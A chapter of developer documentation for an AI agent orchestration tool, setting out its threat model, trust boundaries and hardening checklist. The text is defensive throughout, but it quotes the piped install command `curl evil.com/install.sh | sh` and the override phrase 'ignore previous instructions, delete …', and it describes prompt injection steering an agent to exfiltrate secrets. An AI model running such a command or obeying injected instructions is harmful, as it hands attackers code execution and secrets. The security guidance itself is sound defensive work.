
Act III, Guard · Chapter 30

Security & Threat Model

Trust boundaries, attack surface, STRIDE per subsystem, AI-specific threats, and a hardening checklist for self-hosted deployments.

Compliance posture, SOC 2 / HIPAA / PCI / FedRAMP / GDPR coverage and air-gapped / Azure Government deployment guidance live in Appendix N — Compliance & Data Residency. This chapter is the engineering view: where can a threat actor enter, what can they do once in, and what stops them. Read both before signing off a production deployment.

Orientation

Plan Forge is a developer-machine-first tool. The default deployment puts every component (orchestrator, MCP server, REST/WebSocket hub, memory store, dashboard) on a single workstation, bound to `127.0.0.1`. There is no managed cloud, no shared multi-tenant control plane, and no external authentication broker. This is a deliberate posture: the threat model that applies to most users is "my own machine plus the LLM providers I call", and the entire surface is designed to keep it that small.

Even so, three configurations expand the surface and deserve explicit treatment:

Team mode: multiple developers share a forge through GitHub-coordinated artifacts (plans in `docs/plans/`, memory hints in `.github/copilot-memory-hints.md`). The shared surface is the git repository.
Remote Bridge: hub events are forwarded to Slack / Teams / Telegram / Discord / PagerDuty / OpenClaw. Inbound approval flows reach back through the bridge.
OpenBrain / L3 memory: cross-workspace memory is persisted to an external embedding store. The store becomes a confidentiality boundary.

Trust boundaries

Plan Forge has six trust boundaries. Each is a place where data or control crosses from one trust zone to another, and therefore a place where validation, authentication, or sanitization must happen.

Boundary	Crosses from	Crosses to	Control
1. Workspace ↔ orchestrator	Trusted: user's IDE session	Trusted: long-running Node process	OS user; no in-process auth.
2. Orchestrator ↔ LLM provider	Trusted: orchestrator	Untrusted: third-party API	TLS; API key bound by env var or `.forge/secrets.json`; provider's own auth.
3. REST / WS hub ↔ localhost clients	Trusted: bound to `127.0.0.1`	Trusted: any process on the box	Loopback binding; no token auth by design.
4. Worker ↔ plan / repo files	Trusted: orchestrator-spawned	Untrusted: file contents may include attacker text	PreToolUse hook (Forbidden Actions); scope contract.
5. Hub ↔ Remote Bridge channel	Trusted: hub event	Untrusted: third-party messenger	Per-channel webhook token; outbound only by default; inbound approvals authenticated against bridge config.
6. Memory L2 ↔ OpenBrain L3	Trusted: local L2 jsonl	Untrusted: external embedding store	Opt-in (off by default); per-record redaction; `memory.l3Endpoint` + token in `.forge.json`.

Loopback binding is the single most load-bearing control. The REST hub, WebSocket hub, and dashboard all bind to `127.0.0.1`. They are not hardened against network-attached attackers. If you reverse-proxy them onto a network interface, you must front them with your own auth (mTLS, OIDC, or a network ACL); see the Hardening checklist.
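One way to make the loopback rule checkable at startup or in CI is to reject any bind address that is not a literal loopback IP. The following is a minimal sketch, not Plan Forge code: `is_loopback_bind` is a hypothetical helper, and it deliberately fails closed on hostnames (including `localhost`) because they depend on local name resolution.

```python
import ipaddress


def is_loopback_bind(host: str) -> bool:
    """Return True only when `host` is a literal loopback IP address.

    Hypothetical helper for illustration. Hostnames and malformed
    input are treated as unsafe (fail closed).
    """
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        # Not a literal IPv4/IPv6 address, e.g. "localhost" or "example.com".
        return False
```

A launcher could call this on the configured hub address and refuse to start, or demand an explicit override, when it returns `False` (for example for `0.0.0.0`).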

Attack surface enumeration

Every place an attacker-controlled byte can enter the system. Catalog this before reaching for STRIDE.

Surface	Input	Attacker class
REST endpoints (113 routes, Appendix W)	JSON body, query string, path params	Local process on the same box (any user with shell access).
WebSocket hub (`:3101/hub`)	Subscribe / publish frames	Same as REST.
MCP stdio channel	JSON-RPC method calls from the IDE	Whoever controls the IDE session (typically: the user, or a malicious extension).
Plan files (`docs/plans/Phase-*.md`)	Markdown + bash gate commands + scope contract	Anyone who can land a PR. Plan files are executable in the sense that gate commands run as the orchestrator user.
SKILL.md files (`.github/skills/*`)	Markdown + bash blocks per step	Anyone who can land a PR. Skills run with the same privileges as the orchestrator.
Hook scripts (`.github/hooks/*`)	PowerShell / bash invoked at lifecycle events	Anyone who can land a PR. Hooks run on every session start, every tool use, every commit.
LLM tool output (worker responses)	Free-form text, code blocks, tool calls	Indirect: an attacker who poisoned the prompt (prompt injection from a fetched URL, code comment, dependency README, etc.).
Extension catalog (`extensions/catalog.json` + installed packages)	Node packages with full file-system access	Extension author. `pforge ext add` implies trust.
Remote Bridge inbound	Approval / reject webhook calls from messengers	Anyone with the bridge token (or anyone who can spoof the messenger's HMAC if you skipped verification).

STRIDE per subsystem

The relevant threats per subsystem, tagged by STRIDE category: S = Spoofing, T = Tampering, R = Repudiation, I = Information disclosure, D = Denial of service, E = Elevation of privilege.

Subsystem	Top threats	Mitigation
Orchestrator	T: tampered plan file injects malicious gate. E: skill step shells out as the user.	PR review on plan/skill changes. PreToolUse hook enforces Forbidden Actions. Gate commands run in the user's existing shell with no sandbox, so plan/skill authors are inside the trusted computing base (TCB).
REST / WS hub	I: any local process can read the hub stream (run history, costs, source snippets). E: any local process can `POST /api/run-plan`.	Loopback binding only. Operating-system user isolation is the boundary. Do not run the hub as root / SYSTEM.
MCP server	T: malicious IDE extension calls `forge_run_plan` on an attacker plan. I: same extension reads `forge_search` across the repo.	Treat the IDE as the trust boundary. Only install MCP-aware IDE extensions you trust. Plan Forge does not differentiate "good" vs "bad" callers on the stdio channel.
LLM provider call	I: provider sees prompts and code snippets. T: provider returns attacker text (prompt-injection downstream).	API key per provider (env var or `.forge/secrets.json`). Outbound TLS. Provider terms of service govern retention, see Appendix N — Data flow.
Memory L2 / L3	I: cross-workspace memory leaks sensitive context. T: poisoned L3 entry steers future runs.	L2 is local jsonl; L3 is opt-in. `forge_memory_capture` redacts by configured patterns. Per-workspace `memory.namespace` isolates L3 reads.
Remote Bridge	S: attacker spoofs a Slack interactive callback to approve a slice. I: bridge forwards sensitive event details off-box.	Verify HMAC on inbound webhooks (Slack / Teams enforce by default; verify manually for generic webhooks). Filter events by severity in `.forge.json#bridge.filters`. See Chapter 20 — Remote Bridge security.
Extensions	E: extension's `postinstall` runs arbitrary code. T: extension hooks tamper with plan execution.	`pforge ext add` installs from npm by default; treat it as you would any production dependency. Pin versions in `.forge.json#extensions[]`. Audit catalog entries before enabling.

AI-specific threats

Three threat classes are unique to AI-driven systems and are not adequately captured by classic STRIDE. Plan Forge has explicit controls for each.

Prompt injection

An attacker plants instructions in content the worker will read: a URL the agent fetches, a code comment, a dependency README, a CI log, an issue body. The worker may treat those instructions as authoritative and exfiltrate secrets, modify forbidden files, or call destructive tools.

Scope contract: every plan declares which files the worker may touch. The PreToolUse hook blocks edits outside that scope, even if the worker is "convinced" by injected text to write elsewhere.
Forbidden actions list: a per-plan deny-list of file paths the worker must never modify (typically `.github/workflows/`, secrets, infra IaC). Enforced at hook time.
Tool allow-list per skill: the `tools:` frontmatter in SKILL.md restricts which tools that skill may call. A skill cannot escalate by invoking a tool it didn't declare.
No auto-fetch by default: the orchestrator does not browse arbitrary URLs unless the plan / skill explicitly invokes a fetch tool. The fetch surface is opt-in per slice.
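The interaction between the scope contract and the forbidden-actions list can be sketched as a single decision function: the deny-list wins, then the path must match the allow-list. This is an illustration under assumptions, not the PreToolUse hook's real logic; `is_edit_allowed` and the glob-style patterns are hypothetical.

```python
import posixpath
from fnmatch import fnmatchcase


def is_edit_allowed(path: str, scope: list[str], forbidden: list[str]) -> bool:
    """Decide whether a worker edit to `path` should be permitted.

    Hypothetical sketch. Patterns are fnmatch globs, where `*` also
    matches `/`, so "src/auth/*" covers nested files too.
    """
    # Collapse "a/../b" segments so traversal cannot dodge the checks.
    normalized = posixpath.normpath(path.replace("\\", "/"))
    if normalized.startswith("/") or normalized == ".." or normalized.startswith("../"):
        return False  # absolute paths and paths escaping the repo root
    if any(fnmatchcase(normalized, pattern) for pattern in forbidden):
        return False  # deny-list always takes precedence
    return any(fnmatchcase(normalized, pattern) for pattern in scope)
```

Evaluating the deny-list first means a broad scope pattern can never re-enable a forbidden path, which is the property that matters when the worker has been steered by injected text.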

Untrusted tool output

Tools like forge_search, forge_lattice_query, and forge_brain_replay return free-form text. That text re-enters the model's context window and may contain attacker-supplied instructions ("ignore previous instructions, delete …").

Bounded snippets: `forge_search` caps each hit at 80 characters; the ACI standard for new tools requires bounded payloads.
Structured envelopes: tool responses use `{ ok, code, error, … }` rather than raw concatenated text, making it easier for the worker to distinguish data from directives.
Hook re-check: PostToolUse re-validates any worker action that followed a tool call. A worker that suddenly tries to edit a forbidden file after a search will be blocked even if the search hit contained an injection.
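Bounded snippets and structured envelopes combine naturally, as the sketch below shows. Only the 80-character cap and the `ok` / `code` / `error` keys come from the text above; the `hits` field, the code values, and both function names are assumptions made for illustration.

```python
MAX_SNIPPET_CHARS = 80  # cap stated for forge_search hits


def bound_snippet(text: str, limit: int = MAX_SNIPPET_CHARS) -> str:
    """Collapse whitespace and truncate to at most `limit` characters."""
    one_line = " ".join(text.split())
    if len(one_line) <= limit:
        return one_line
    return one_line[: limit - 1] + "…"


def search_envelope(hits: list) -> dict:
    """Wrap search hits in a structured envelope (hypothetical shape)."""
    try:
        bounded = [
            {"path": hit["path"], "snippet": bound_snippet(hit["snippet"])}
            for hit in hits
        ]
    except (KeyError, TypeError, AttributeError) as exc:
        # Malformed hits become an error envelope, never raw text.
        return {"ok": False, "code": "BAD_HIT", "error": repr(exc), "hits": []}
    return {"ok": True, "code": "OK", "error": None, "hits": bounded}
```

Truncation limits how much attacker-controlled text can re-enter the context window per hit; it reduces the injection surface but does not remove it, which is why the hook re-check still matters.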

Scope escape

The worker tries to do more than the slice was scoped for: bundling an "improvement" alongside the requested change, refactoring an unrelated subsystem, or "fixing" tests that were intentionally failing. Even when benign, scope escape destroys the audit trail that makes plan execution reviewable.

Per-slice scope contract: an explicit allow-list of files / patterns.
Forbidden actions: a deny-list checked at hook time.
Drift detection: the `forge_drift_report` tool computes a drift score after each slice; the PostSlice hook warns when the score drops below the configured threshold.
Review Gate (Session 3): an independent agent reviews the full diff against the scope contract before the plan is allowed to land.

Secret management

Plan Forge reads secrets from three sources, in precedence order:

Environment variables: `XAI_API_KEY`, `OPENAI_API_KEY`, `ANTHROPIC_API_KEY`, `GITHUB_TOKEN`, etc. The standard CI path.
`.forge/secrets.json`: a gitignored local file, JSON key→value. The standard developer-machine path.
OAuth via `gh auth login`: the zero-key path for GitHub Copilot routing. Token managed by the GitHub CLI.
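The first two steps of that precedence order can be sketched as follows. This is an illustration, not Plan Forge's loader: `load_secrets_file` and `resolve_secret` are hypothetical names, and the OAuth fallback is left out because the GitHub CLI manages that token itself.

```python
import json
import os
from pathlib import Path


def load_secrets_file(path: str = ".forge/secrets.json") -> dict:
    """Read the key→value secrets file; a missing or invalid file yields {}."""
    try:
        data = json.loads(Path(path).read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return {}
    return data if isinstance(data, dict) else {}


def resolve_secret(name: str, env=None, file_secrets=None):
    """Return (value, source), preferring the environment over the file."""
    env = os.environ if env is None else env
    file_secrets = load_secrets_file() if file_secrets is None else file_secrets
    if env.get(name):
        return env[name], "env"
    if file_secrets.get(name):
        return file_secrets[name], "secrets.json"
    return None, None  # caller may fall back to the gh-managed OAuth token
```

Returning the source alongside the value lets diagnostics report where a key came from without ever printing the key itself.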

Secrets never go in .forge.json, copilot-instructions.md, plan files, or anywhere else committed to the repo. The forge_secret_scan tool (called automatically by the LiveGuard preDeploy hook) scans staged changes for high-entropy strings, known token prefixes, and provider-specific shapes before allowing a deploy slice to proceed.
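To make the scanning idea concrete, here is a rough sketch of how a prefix-plus-entropy check can work. It does not describe how `forge_secret_scan` is implemented: the prefix list, the 20-character minimum, and the 4.0-bit threshold are assumptions chosen for illustration, and a heuristic like this produces false positives on long paths or hashes.

```python
import math
import re
from collections import Counter

# A few widely documented token prefixes (GitHub, OpenAI-style, Slack, AWS).
KNOWN_PREFIXES = ("ghp_", "sk-", "xoxb-", "AKIA")
TOKEN_RE = re.compile(r"[A-Za-z0-9_\-+/=]{20,}")
ENTROPY_THRESHOLD = 4.0  # bits per character; assumed cut-off


def shannon_entropy(value: str) -> float:
    """Shannon entropy of `value` in bits per character."""
    total = len(value)
    counts = Counter(value)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def find_suspect_tokens(text: str) -> list[tuple[str, str]]:
    """Return (token, reason) pairs for strings that look like secrets."""
    findings = []
    for match in TOKEN_RE.finditer(text):
        token = match.group()
        if token.startswith(KNOWN_PREFIXES):
            findings.append((token, "known-prefix"))
        elif shannon_entropy(token) >= ENTROPY_THRESHOLD:
            findings.append((token, "high-entropy"))
    return findings
```

Running a check like this over the staged diff only, rather than the whole tree, keeps it fast enough to sit in front of every deploy slice.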

If a secret was committed: rotate the credential first (revoke the leaked one, issue a new one), then rewrite history with `git filter-repo`, force-push, and notify anyone who may have pulled the leaked commit. Order matters: rewriting history does not retroactively un-leak a credential that has already been mirrored or fetched.

Supply chain

Plan Forge has three supply-chain entry points; each has explicit controls.

Entry point	Trust establishment	Update / verification
Plan Forge itself (template files, presets, prompts)	You cloned / installed from `github.com/srnichols/plan-forge`.	`pforge self-update` verifies the GitHub release tag; `pforge check` validates installed file checksums against the manifest.
Extensions (`extensions/catalog.json`)	Per-extension npm scope. Catalog lists publisher.	Pin version in `.forge.json#extensions[]`. Audit the package before `pforge ext add`. CI should fail on unaudited additions.
LLM providers	Provider TOS + your API key.	Out of scope for Plan Forge controls; managed by the provider.
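Checksum validation against a manifest, as described for `pforge check`, follows a common pattern that the sketch below illustrates. The manifest shape (relative path mapped to a SHA-256 hex digest) and the function names are assumptions; the real manifest format may differ.

```python
import hashlib
from pathlib import Path


def sha256_of(path) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(root, manifest: dict) -> dict:
    """Return {relative_path: problem} for files that fail verification.

    `manifest` maps relative paths to expected SHA-256 hex digests
    (hypothetical format). An empty result means everything matched.
    """
    problems = {}
    for relative_path, expected in manifest.items():
        target = Path(root) / relative_path
        if not target.is_file():
            problems[relative_path] = "missing"
        elif sha256_of(target) != expected.lower():
            problems[relative_path] = "checksum mismatch"
    return problems
```

A check like this only proves the files match the manifest; the manifest itself still has to come from a source you trust, which is what the release-tag verification is for.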

Sandboxing & gate execution

Plan Forge does not sandbox worker file edits, gate commands, skill bash blocks, or hook scripts. These run with the orchestrator process's full privileges (i.e. the user's shell privileges). This is a deliberate trade-off: the alternative is shipping a container-based execution model, which would complicate `pforge run-plan` by an order of magnitude and break the "feels like a normal dev tool" experience that the project optimizes for.

What this means for threat modelers:

The orchestrator user is the TCB boundary. Anyone who can push a commit that lands a plan / skill / hook can run code on every developer machine that pulls and runs that plan.
This is the same threat model as CI/CD scripts, package.json postinstall, or Makefile targets. Plan Forge adds no new sandbox, but adds no new escape either.
Mitigation is process: PR review on `docs/plans/`, `.github/skills/`, and `.github/hooks/` by people who would catch `curl evil.com/install.sh | sh` in a regular pipeline file.

Two near-term defenses Plan Forge does provide:

Gate timeout: gates default to 120s; runaway commands are killed (`statusReason: worker-signaled`; see Appendix X, OS subprocess exits).
PreDeploy LiveGuard hook: runs `forge_secret_scan` + `forge_env_diff` before the deploy slice and blocks on severity ≥ high.
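The gate timeout behaves like an ordinary subprocess deadline. The sketch below shows the general technique with Python's standard library; it is not the orchestrator's implementation (which the text describes as a Node process), and the `run_gate` name and result fields are hypothetical. Only the 120-second default comes from the text above.

```python
import subprocess
import sys

DEFAULT_GATE_TIMEOUT_S = 120  # default stated above


def run_gate(argv: list[str], timeout_s: float = DEFAULT_GATE_TIMEOUT_S) -> dict:
    """Run a gate command and kill it if it exceeds the deadline.

    Hypothetical result shape. Note that subprocess.run kills only the
    direct child on timeout; grandchildren may need process-group handling.
    """
    try:
        done = subprocess.run(argv, capture_output=True, text=True,
                              timeout=timeout_s)
    except subprocess.TimeoutExpired:
        return {"ok": False, "reason": "timeout", "exit_code": None}
    return {"ok": done.returncode == 0, "reason": "exited",
            "exit_code": done.returncode}
```

For example, `run_gate([sys.executable, "-c", "import time; time.sleep(600)"], timeout_s=1)` returns a result whose `reason` is `"timeout"` instead of blocking the run for ten minutes.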

Hardening checklist

For self-hosted deployments or shared-machine scenarios, work through this list before shipping. Each item maps to a specific control surface or configuration in .forge.json / environment variables.

Control	Default	Production action
Hub bound to `127.0.0.1`	Yes	Confirm; never bind `0.0.0.0` without an auth proxy.
Run orchestrator as non-privileged user	User-dependent	Verify; never run as root / SYSTEM.
Secrets only in env or `.forge/secrets.json`	Yes	Audit repo with `forge_secret_scan`; rotate any historic leaks.
`.forge/secrets.json` gitignored	Yes (template)	Confirm `.gitignore` entry; CI should fail if absent.
PreToolUse hook installed	Yes (post-setup)	Verify `.github/hooks/PreToolUse.md` present; `pforge smith` reports it.
PreDeploy LiveGuard hook enabled	Configurable	Enable in `.forge.json#hooks.preDeploy` with severity threshold `high`.
Plan / skill / hook PR review required	User-dependent	Branch protection: require review on `docs/plans/`, `.github/skills/`, `.github/hooks/**`.
Extensions pinned by version	User-dependent	Pin in `.forge.json#extensions[].version`; CI fails on bare-name installs.
Remote Bridge HMAC verified	Per channel	Slack / Teams: built in. Generic webhooks: configure `bridge.<channel>.signingSecret`.
L3 memory opt-in only	Off	Leave off unless required; if on, configure per-workspace `memory.namespace` and redaction patterns.
Audit log retention configured	30 days	Adjust `.forge.json#audit.retentionDays` per compliance requirement (see Appendix N — Audit logging).
Air-gapped deployment validated	N/A	If required, follow Appendix N — Air-gapped deployment playbook.
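Several rows of the checklist can be turned into an automated CI check over the parsed `.forge.json`. The sketch below covers three of them and rests on assumptions: it uses the key paths named in the table (`extensions[].version`, `memory.l3Endpoint`, `memory.namespace`, `audit.retentionDays`), but the `name` field on extension entries and the function itself are hypothetical.

```python
import re

# Exact versions only: "1.2.3" or "1.2.3-beta.1", never "^1.2.3" or "latest".
EXACT_VERSION = re.compile(r"\d+\.\d+\.\d+(-[0-9A-Za-z.-]+)?")


def audit_forge_config(config: dict) -> list[str]:
    """Return human-readable findings; an empty list means no issues found."""
    findings = []
    for ext in config.get("extensions", []):
        is_entry = isinstance(ext, dict)
        name = ext.get("name", "<unnamed>") if is_entry else str(ext)
        version = str(ext.get("version", "")) if is_entry else ""
        if not EXACT_VERSION.fullmatch(version):
            findings.append(f"extension {name} is not pinned to an exact version")
    memory = config.get("memory", {})
    if memory.get("l3Endpoint") and not memory.get("namespace"):
        findings.append("L3 memory is on but memory.namespace is not set")
    if "retentionDays" not in config.get("audit", {}):
        findings.append("audit.retentionDays is not set explicitly")
    return findings
```

A CI job could load `.forge.json` with `json.load`, call `audit_forge_config`, and fail the build whenever the returned list is non-empty.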

Incident response

When something does go wrong (a forbidden file edited, a secret leaked, a worker shipped a destructive change), the LiveGuard surface is the front door:

Capture the incident: `forge_incident_capture` records the run id, slice number, affected files, and event timeline. Posts to the Remote Bridge if configured.
Pull the trajectory: `.forge/runs/<runId>/trajectory.jsonl` contains the full worker conversation, every tool call, every event. This is the forensic record.
Triage with the audit loop: `/audit-loop` classifies the finding into bug / spec / classifier lanes and files the appropriate issue.
Roll back: if the slice committed, use `git revert` on the slice commit. The orchestrator's commit-per-slice discipline means each slice is independently revertable.
Capture the lesson: the postmortem feeds back into PROJECT-PRINCIPLES.md, the plan's Temper Guards table, or a new instruction file under `.github/instructions/`.
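When pulling the trajectory, a small filter is often enough to find the tool calls that touched a sensitive path. The sketch below assumes one JSON object per line, which is what the `.jsonl` extension implies; the `type` and `args` field names and the `"tool_call"` value are guesses for illustration, so adjust them to the actual record schema.

```python
import json


def tool_calls_touching(lines, path_fragment: str) -> list[tuple[int, dict]]:
    """Return (line_number, event) for tool calls mentioning `path_fragment`.

    `lines` is any iterable of JSONL strings, such as an open file.
    Field names are hypothetical; unparsable lines are skipped.
    """
    hits = []
    for number, raw in enumerate(lines, start=1):
        raw = raw.strip()
        if not raw:
            continue
        try:
            event = json.loads(raw)
        except json.JSONDecodeError:
            continue  # tolerate a truncated final line
        if not isinstance(event, dict) or event.get("type") != "tool_call":
            continue
        if path_fragment in json.dumps(event.get("args", {})):
            hits.append((number, event))
    return hits
```

Opening the trajectory file and passing the handle directly, with a fragment such as `.github/workflows/`, yields the line numbers to quote in the incident record.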

The full incident-response playbooks for each LiveGuard alert class live in Appendix F — LiveGuard Alert Runbooks.
